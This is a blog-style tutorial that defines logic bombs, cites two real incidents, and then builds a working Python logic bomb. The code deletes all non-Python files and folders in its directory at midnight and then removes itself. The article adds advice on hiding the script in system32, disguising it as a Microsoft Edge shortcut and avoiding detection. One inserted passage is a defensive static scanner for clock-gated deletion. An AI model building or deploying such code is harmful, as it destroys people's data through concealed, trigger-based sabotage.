Definition Of Logic Bombs & Examples In Python

In this article, we examine real-world logic bombs. We also create one in Python to see how it works.

This article is for informational and educational purposes only. My Master Designer is not responsible for any damage that may occur.

What are Logic Bombs?

A malicious piece of code that executes when certain conditions are met is called a logic bomb.

A logic bomb always depends on a condition, for example a certain date, or when the temperature is 75 degrees; the code runs only when that condition holds.

Unlike worms, logic bombs cannot spread to other systems on the network, and they do nothing unless triggered. They are often written to cause harm rather than to steal information.

Until a logic bomb is activated, the user of the software cannot notice it, and some logic bombs may not be understood even after they are triggered.

Logic Bomb Attacks in the Past

There have been many logic bomb attacks in the past, some successful and some unsuccessful. In this section, we will look at 2 major logic bomb attacks.

On July 19, 2019, David Tinley, a contract employee, was found guilty of programming logic bombs in the software he created for Siemens Corporation.

The logic bomb made the software deliberately corrupt itself after a certain period of time; every time it broke down, David Tinley charged a repair fee again. This continued for 2 years.

On March 20, 2013, in an attack launched against South Korea, a logic bomb hit machines and “wiped the hard drives and master boot records of at least three banks and two media companies at the same time.”

Although logic bombs are simple in operation and structure, the damage they cause and the difficulty of recognizing them make them a great threat.

Logic Bomb vs Time Bomb – What’s the Difference?

The term time bomb describes malicious code that is activated within a certain date range. This definition can be confused with the definition of a logic bomb, so let’s explain the difference.

A logic bomb can include a timer that shuts it down if its conditions are not met within a given time frame.

A logic bomb may delete itself or activate its payload using the timing system. Time bombs use only timing functions to activate or deactivate themselves.

Basically, a time bomb can be thought of as a subset of logic bombs.

Creating Logic Bomb in Python

Now we are ready to create a logic bomb in Python. This logic bomb is going to trigger when it’s past 12:00.

To observe how this kind of malicious code can work, we will program it to delete the files in the directory where the file is located.

# Require Library
import os
import pathlib

The os library gives us access to the terminal, and we will use the pathlib library to check for a specific file extension.

When our logic bomb runs, it will leave the .py files alone and remove the remaining files from the hard drive.

# Find files and folders
def find():
  dir = os.getcwd()
  files = os.listdir(dir)

  return files

First, we get the names of the files in the current directory that are to be removed. We also keep the .py files out of the removal list, because we don’t want to remove our main Python file at this point.

# Remove files and directories
def remove():
  for i in find():
    # If suffix is not .py continue
    if pathlib.Path(i).suffix != ".py":
      # If there is suffix continue 
      # If there is no suffix it means it's a folder
      if pathlib.Path(i).suffix != "":
        os.system('rm "{}"'.format(i))
    
    # if it's not contain delete folder
    if pathlib.Path(i).suffix == "":
      os.system('rmdir "{}"'.format(i))

We currently have 2 functions: one that collects files and one that removes them. We will use these functions later; now we need a timer to set the time that triggers them.

from datetime import datetime

# Check Time
def checkDate():
  now = datetime.now()
  current_time = now.strftime("%H:%M:%S")

  target = "00:00:00"
  
  if current_time == target:
    find()
    remove()

When the time is 00:00:00, everything except the Python files in the directory where the file is located will be deleted. You can change your damage technique.

Now we have 2 problems: we need to deactivate the bomb after it is triggered and remove it from the target, and we need to run this software in the background.

First, let’s see how to deactivate and delete our bomb after it has done its job properly.

from sys import argv

# remove itself
def deactivate():
  os.remove(argv[0])

With this method you can destroy the logic bomb you created, which solves the first problem.

# Check Time
def checkDate():
  now = datetime.now()
  current_time = now.strftime("%H:%M:%S")

  target = "00:00:00"
  
  if current_time == target:
    find()
    remove()
    deactivate()

So we can scan, delete files, and then clean our own bomb from the system. Now let’s see how to run the script in the background.
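Seen from the defender's side, the pattern built so far (a value read from the clock, compared in an if, guarding file deletion and self-removal) is something a code reviewer can search for statically. The scanner below is an added example, not part of the original article's code; the CLOCK and DESTRUCTIVE rule sets and the embedded SAMPLE are assumptions constructed for illustration.

```python
import ast
# Assumed rule sets for this example; extend them for your own code base.
CLOCK = {"datetime.now", "datetime.datetime.now", "datetime.today", "time.time"}
DESTRUCTIVE = {"os.remove", "os.unlink", "os.rmdir", "os.system", "shutil.rmtree"}

def dotted(node):  # 'a.b.c' for a Name/Attribute chain, '' for anything else
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    return ".".join(reversed(parts + [node.id])) if isinstance(node, ast.Name) else ""

def names_in(tree):
    return {dotted(n) for n in ast.walk(tree)} - {""}

def scan(source):
    """List (function, line, sinks) for clock-gated branches that reach a destructive call."""
    funcs = {f.name: f for f in ast.walk(ast.parse(source)) if isinstance(f, ast.FunctionDef)}
    # Sinks referenced directly by each local function (resolves one level of indirection).
    direct = {name: names_in(f) & DESTRUCTIVE for name, f in funcs.items()}
    findings = []
    for name, func in funcs.items():
        # Mark variables derived from the clock; len(assigns) passes reach the fixed point.
        assigns = [n for n in ast.walk(func) if isinstance(n, ast.Assign)]
        tainted = set()
        for a in assigns * len(assigns):
            if names_in(a.value) & (CLOCK | tainted):
                tainted |= {t.id for t in a.targets if isinstance(t, ast.Name)}
        for node in ast.walk(func):
            if isinstance(node, ast.If) and names_in(node.test) & (CLOCK | tainted):
                sinks = set()
                for callee in names_in(ast.Module(body=node.body, type_ignores=[])):
                    sinks |= ({callee} & DESTRUCTIVE) | direct.get(callee, set())
                if sinks:
                    findings.append((name, node.lineno, sorted(sinks)))
    return findings
# Constructed sample, parsed only and never executed; it mirrors the article's structure.
SAMPLE = '''
def remove():
    os.system('rm "example.tmp"')
def checkDate():
    now = datetime.now()
    current_time = now.strftime("%H:%M:%S")
    if current_time == "00:00:00":
        remove()
        os.remove(argv[0])
def rotate_logs():
    os.remove("old.log")
'''
```

Calling scan(SAMPLE) reports checkDate and leaves rotate_logs alone, because an unconditional delete is not gated on the clock.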

Hiding Logic Bomb

In this part, we are going to learn how to hide the logic bombs in the system as an application. Let’s make our code a little more sneaky.

  • It’s often useful to put the logic bomb in a file that is rarely browsed (unknown files of the disk drives or system32).
  • Then create a shortcut of it on the desktop as we will need to trigger this logic bomb.

In this section, we will update our code a little more by addressing these 2 scenarios. First, let’s change some code to make the file look like an application.

# For starting Edge
os.startfile('msedge.exe')

As is well known, Edge cannot be deleted from Windows devices, so it is a great option for hiding this bomb; we will present our code as an Edge shortcut.

Every time the shortcut we created from the main file path is activated, the logic bomb will be activated first, then the Edge window will open.

Of course, one problem is that 2 Edge shortcuts can then be found on the desktop; you can add a scan function to the file to prevent this.

Limiting the Number of Services

The most important characteristic of a logic bomb is that it goes undetected until triggered. Our current code has a major flaw: it does not limit the number of services.

So what does it mean not to limit the number of these services? Every time our code is started, pythonw runs again and creates a new service.

After a while, the number of services may become more than the computer can withstand, and problems such as slowdowns and freezing may be noticed.

To fix this, we will create automation that counts the number of script entries. So instead of opening a service at each login, we will create it once.

Yes, the code here takes our login number and forces the services to run only once. However, as you may have noticed, after the service has stopped it does not open again, because of the number of entries.

Here, an extra text file named count is created, and when the script self-destructs it does not destroy that file, so we will now update the deactivate function.

# Close and remove Count file
# Also destruct yourself

def deactivate():
  f.close()
  os.system("del /f /q count.txt")
  os.remove(argv[0])

We have finished the fixes and updates needed before testing, so now we can fully test our code.

If you want to test the logic bomb on your system (check everything first and, if possible, use a VM), you can find the full code on GitHub.

Testing Logic Bomb

We designed the logic bomb not to cause any damage to the system when it is well isolated, so run it in a folder where there are no important documents.

You can also run it in a virtual machine, but the virtual machine must be a Windows device, because the script commands will only run in the Windows Command Prompt.

Logic Bomb – Not Active

As you can see, there is an Edge shortcut on the desktop; this shortcut actually depends on the logic bomb on the C drive.

The script will run when you run the shortcut. The first time it runs, Microsoft Edge will open and the script will start running in the background.

Whether Edge is closed or a new application is opened and work continues, the logic bomb will explode unless the service is closed.

The count file will be created on the C drive, that is, in the location where the logic bomb is, so it will not be noticed. Both will be cleaned up when the job is done.

Logic Bomb – Active

When we start the script, we should see the Microsoft Edge application open, which reduces the probability that the user detects the script running in the background.

When the timer ends, the data in the directory where your script file is will be deleted (put the script in an empty folder to prevent data loss).

Conclusion

Congratulations, you have now learned what a logic bomb is and how it is constructed.

Real logic bombs are not as harmless as the one in this article (which can still do harm if run by someone who does not understand it); they usually threaten all the data in your directories.

You can also explore different aspects of the Logic Bomb by changing its functionality. Good coding, have fun!

Disclaimer: This article is for educational purposes only, My Master Designer is not responsible for any damages that may occur.
